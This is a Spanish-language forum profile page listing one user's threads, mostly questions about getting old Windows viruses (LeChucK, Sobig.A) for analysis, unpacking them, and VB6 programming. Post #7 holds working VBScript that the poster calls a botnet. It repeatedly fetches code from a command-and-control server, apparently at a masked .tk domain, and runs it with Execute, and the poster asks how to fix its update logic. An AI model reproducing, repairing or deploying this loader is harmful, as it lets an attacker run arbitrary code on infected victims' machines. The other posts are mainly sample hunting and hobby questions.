Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Monkeykiller_vb

Páginas1
#1
Análisis y Diseño de Malware / Unpacker para PETite v.2.3
5 Julio 2020, 01:49 AM
Estaba viendo como analizar el código fuente de W32 Lechuck, me di cuenta de que tenia un packer.
Descargue una herramienta llamada RDG Packer Detector para saber cual era, y empezé a buscar un unpacker para verlo con el vbdecompiler. Encontré 2 versiones diferentes del unpacker (Usando la Wayback Machine):

http://web.archive.org/web/20160324132204/http://exetools.com/files/unpackers/win/unpetite.zip
http://web.archive.org/web/20160324132204/http://exetools.com/files/unpackers/win/enlarge1.zip

Pero ninguno de estos funcionó.

Alguien conoce algun otro unpacker?
Gracias de antemano. :)
#2
Análisis y Diseño de Malware / [Perdon si no deberia ir aqui] Servidor SMTP para pruebas de malware
14 Febrero 2020, 05:54 AM
Hola! Necesito ayuda. Quiero hacer un servidor SMTP para hacer pruebas con distintos tipos de malware, pero busque y no me funciono, estoy usando (de paso para probarlo) Windows Server 2000.
Alguna sugerencia? Gracias de antemano.

EDIT: Quiero usarlo en Outlook Express

PD: Puse el tema aqui ya que voy a usar este servidor para analizar como funcionan distintos virus
#3
Programación Visual Basic / Melting Screen
9 Noviembre 2019, 07:59 AM
Una pregunta: ¿Conocen alguna manera de hacer un efecto de pantalla goteando como el virus melting screen en vb6? Quiero saber cómo funciona

Saludos de antemano
Pd: Intenté decompilar el virus melting screen pero fue en vano :(
#4
Análisis y Diseño de Malware / Descargar Malware
7 Noviembre 2019, 03:41 AM
Alguien puede decirme alguna página de malware de virus antiguos?

Estoy buscando un virus llamado Sobig.A, además de otros virus.

Cualquier ayuda es bien recibida :)
#5
Programación Visual Basic / Usar sockets en vb6 sin registrar
1 Noviembre 2019, 00:38 AM
Hay alguna forma de utilizar los sockets en vb6 sin registrar el ocx?   :)
Por ejemplo, dejarlo en la carpeta del ejecutable y que lo importe de ahi sin registrarlo, para que no requiera permisos de administrador

Estoy buscando una solucion desde hace semanas y no encuentro nada.  :-\
Alguna idea? Gracias
#6
Análisis y Diseño de Malware / [Resuelto] Alguien tiene el virus W32 LeChucK?
31 Octubre 2019, 18:43 PM
Desde hace meses que me viene interesando este virus. Quiero analizarlo para ver su funcionamiento.  :D
Nombre Real: Worm_VB.FKO
Alias:

  • Trojan-Downloader.Win32.VB.bbl
  • Generic.dx
  • W32.SillyFDC
  • TR/Dldr.VB.bbl.2
El que tenga informacion sobre como conseguir este virus comente y pase link

Desde ya muchas gracias  ;D
#7
Scripting / Error de XmlHTTP
11 Octubre 2019, 23:05 PM
Hola! Tengo un problema con uno de mis proyectos, quiero hacer una botnet vbs pero no funciona como esperaba:
Código [Seleccionar]

On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set http = CreateObject("Microsoft.XmlHttp")

Do
Set file = fso.OpenTextFile(fso.getSpecialFolder(2) & "\k.tmp", 1, True)
filex = file.readAll
file.Close
http.open "GET", "http://*****.tk/btnet/cmdint.php", False
http.send
If Not(http.responsetext = filex) Then
Set file = fso.OpenTextFile(fso.getSpecialFolder(2) & "\k.tmp", 2, True)
file.Write http.responsetext
file.Close
Execute http.responsetext
End If
Wscript.Sleep 15000
Loop


Cuando se inicia por primera vez, la botnet busca en mi servidor C&C el codigo a ejecutar.
Luego, ejecuta el codigo y lo guarda en un archivo llamado k.tmp
Cuando se repite deberia volver a buscar el codigo en el servidor, y gracias al archivo k.tmp, verificar si el codigo ya se ejecutó antes.

El problema es que cuando ocurre el loop y el archivo de instrucciones del servidor se actualizó, la botnet no recibe el nuevo codigo, sino el anterior  :-\

¿Como puedo solucionarlo?
#8
Scripting / Cambia en algo?
10 Octubre 2019, 03:47 AM
Me di cuenta que muchas personas en vbs utilizan la siguiente instrucción:
Código [Seleccionar]
Set fso = Nothing

¿Cambia en algo que lo ponga? ¿Para que me podría servir?
#9
Programación Visual Basic / ¿Otro MSGBox?
5 Octubre 2019, 04:51 AM
Hola! Estaba viendo algunos videos del youtube danooct1 cuando de repente vi esto:



Y me gustaria saber como se llamaria a ese MSGBOX, no creo que sea un formulario ya que otros virus usan el mismo diseño, y no me parece que casualmente usen el mismo diseño... :/

Cualquier ayuda es bien recibida :D
#10
Programación Visual Basic / Retornar Aplicación vb6 por línea de comandos
2 Octubre 2019, 06:20 AM
Hola! Quiero crear una aplicación que reciba argumentos a través de línea de comandos (Creo que con command()) y luego poder imprimir un mensaje a través de CMD. Se puede conseguir?

Gracias de antemano. :)
#11
Programación Visual Basic / Cambiar la posición inicial de un Form
1 Octubre 2019, 19:31 PM
Quiero lograr cambiar la posicion de un formulario a una parte aleatoria de la pantalla. Estoy intentando utilizar SetWindowPos, pero sigue apareciendo en la esquina superior izquierda.
Gracias de Antemano
#12
Programación Visual Basic / Source de Fire SYSTEM Executer
29 Septiembre 2019, 22:16 PM
Alguien tiene el Source + binario de Fire SYSTEM Executer? ES URGENTE, plz

pd: no sé si este tema va aquí, cualquier cosa nueva lo :)
#13
Análisis y Diseño de Malware / Alguien conoce una Base de Datos Malware online?
20 Diciembre 2018, 22:25 PM
Volvi a crear este tema porque no se si se publico  :P.
Alguien conoce alguna Base de Datos Online sobre malware? Estoy buscando el Worm Worm_VB.fko y no lo encuentro por ningun lado. Es para analizarlo y leer su codigo fuente en VirtualBox.

¿Alguien tiene el ejecutable o algun sitio web que conozcan?

No puedo poner el enlace de mi filebox asi que lo enviare a quien lo tenga
Páginas1